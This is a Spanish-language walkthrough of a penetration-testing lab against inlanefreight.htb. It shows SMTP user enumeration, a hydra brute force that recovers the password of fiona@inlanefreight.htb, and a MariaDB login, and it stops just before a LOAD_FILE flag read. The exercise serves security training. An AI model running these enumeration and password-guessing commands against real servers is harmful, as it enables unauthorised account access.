La empresa Inlanefreight nos encargó realizar una prueba de penetración en 3 hosts diferentes para comprobar la configuración y la seguridad de los servidores. Se nos informó que se había colocado una flag en algún lugar de cada servidor para demostrar el acceso exitoso. Estas flags tienen el siguiente formato:
HTB{...}
Nuestra tarea es revisar la seguridad de cada uno de los tres servidores y presentársela al cliente. Según nuestra información, el primer servidor es un servidor que gestiona los correos electrónicos, los clientes y sus archivos.
Su objetivo es el dominio inlanefreight.htb. Evalúa el servidor de destino y obtén el contenido del archivo flag.txt. Envíalo como respuesta.
Encontramos varios puertos abiertos, entre ellos el 25 SMTP, por lo que probaremos a hacer una enumeración de usuarios.
Acceso web
Si accedemos por el puerto 80 nos encontramos el servicio web:
Enumeración de usuarios
smtp-user-enum-MRCPT-Uusers.list-Dinlanefreight.htb-t10.129.203.7Startingsmtp-user-enumv1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )----------------------------------------------------------|ScanInformation|----------------------------------------------------------Mode.....................RCPTWorkerProcesses.........5Usernamesfile...........users.listTargetcount.............1Usernamecount...........79TargetTCPport..........25Querytimeout............5secsTargetdomain............inlanefreight.htb######## Scan started at Tue Apr 30 15:35:33 2024 #########10.129.183.68:fiona@inlanefreight.htbexists######## Scan completed at Tue Apr 30 15:36:22 2024 #########1results.
Encontramos 1 usuario de SMTP: fiona@inlanefreight.htb
Bruteforce
Vamos a usar hydra con el diccionario rockyou para averiguar la contraseña de fiona:
hydra -l fiona@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt -t 64 -f 10.129.203.7 smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-30 17:58:46
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking smtp://10.129.203.7:25/
[25][smtp] host: 10.129.203.7 login: fiona@inlanefreight.htb password: 987654321
[STATUS] attack finished for 10.129.203.7 (valid pair found)
Buum!! Tenemos la contraseña:
fiona@inlanefreight.htb
987654321
Conexión a MySQL
mysql-ufiona-p-h10.129.203.7Enterpassword:WelcometotheMariaDBmonitor.Commandsendwith ; or \g.YourMariaDBconnectionidis14Serverversion:10.4.24-MariaDBmariadb.orgbinarydistributionCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type'help;'or'\h'forhelp.Type'\c'toclearthecurrentinputstatement.MariaDB [(none)]> SHOW DATABASES;+--------------------+|Database|+--------------------+|information_schema||mysql||performance_schema||phpmyadmin||test|+--------------------+5rowsinset (0,072 sec)MariaDB [(none)]>
Conseguimos acceder correctamente a la base de datos, por lo que vamos a buscar información relevante.
Después de enumerar todas las bases de datos no encontramos nada relevante, por lo que vamos a intentar leer la flag directamente con LOAD_FILE:
